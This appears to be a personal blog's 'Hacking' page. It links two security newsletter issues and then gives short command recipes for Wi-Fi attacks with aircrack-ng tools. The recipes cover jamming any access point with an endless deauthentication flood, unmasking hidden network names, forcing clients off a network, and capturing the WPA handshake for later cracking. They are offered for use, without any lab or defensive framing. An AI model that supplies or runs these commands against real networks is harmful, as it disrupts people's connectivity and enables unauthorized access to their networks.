Hacking

Zack Whittaker - Week in Security Volume 5, Issue 44

Submitted by rbosaz on Sun, 11/27/2022 - 13:31

Check out Zack Whittaker's Week in Security Volume 5, Issue 44

Content Listing ...

  • Police seize iSpoof call spoofing site, warns 70,000 victims by text message
  • U.S., Britain take ban hammers to Huawei, ZTE, Hikvision
  • A leak details Apple's secret dirt on security startup Corellium

Subscribe

Zack Whittaker - Week in Security Volume 5, Issue 42

Submitted by rbosaz on Wed, 11/16/2022 - 13:49

Check out Zack Whittaker's Week in Security Volume 5, Issue 42

Content Listing ...

  • Twitter's CISO departs after Musk takeover
  • U.S. seizes $3.36 billion in cryptocurrency from second Silk Road hacker
  • Australia faces consequences of standing up to ransomware

Subscribe

Jamming any Wi-Fi Access Point

Submitted by rbosaz on Thu, 10/27/2022 - 14:54

First identify the target AP's MAC address, then use the following command:

sudo aireplay-ng -0 0 -a <Target AP's MAC> <WLAN Name>

Note: -0 0 will execute deauth to infinity

Websploit is another tool that can be used, but you'll need to install it first.

Using the terminal execute the app as follows.

websploit

Available modules can be seen by executing the following.

show modules

 

 

Determine Hiiden AP's Name

Submitted by rbosaz on Tue, 10/25/2022 - 11:39

First put WLAN in monitoring mode.

Using the following command, find an AP where its essid is <length:  0>:

airodump-nd <WLAN Name>

Now gather data from the zero length essid AP using the following command:

airodump-ng -c <AP_0 Channel> --bssid <AP_0 MAC> <WLAN Name>

Where: AP_0 = Zero Length AP.

Open up another terminal and disconnect one of the clients attached to the zero length AP:

aireplay-ng -0 3 -a <AP_0 MAC> -c <Client MAC> <WLAN Name>

Once disconnected notice the essid of the AP_0 display a name.

 

Disconnect Client from AP

Submitted by rbosaz on Tue, 10/25/2022 - 11:24

First get Target AP's client connections using the commands in this reference:

Capture Data from Target AP

Open a second terminal and disconnect a client from the AP by executing the following command. This will allow one to capture the handshake between the AP and client. Handshake will be in the generated pcap file.

aireplay-ng -0 3 -a <Target AP's bssid> -c <Target AP's Client's essid> <wlan name>

Note: the -0 3 is telling the command to execute three times, you can increase the three to a larger value to keep client from reconnecting.

Capture Data from Target AP

Submitted by rbosaz on Tue, 10/25/2022 - 11:19

Once you find an AP target execute the following command to capture data from the AP:

sudo airodump-ng --channel <Target AP's Channel> --bssid <Target AP's MAC> --write <Output File Name> <Your WLAN Name>

You can quit using ctrl+c or hitting 'q' twice.

The above command will create the following files:

  • <Output File Name>.csv
  • <Output File Name>.pcap: this file will have the handshake information
  • <Output File Name>.kismet.csv
  • <Output File Name>.kismet.netxml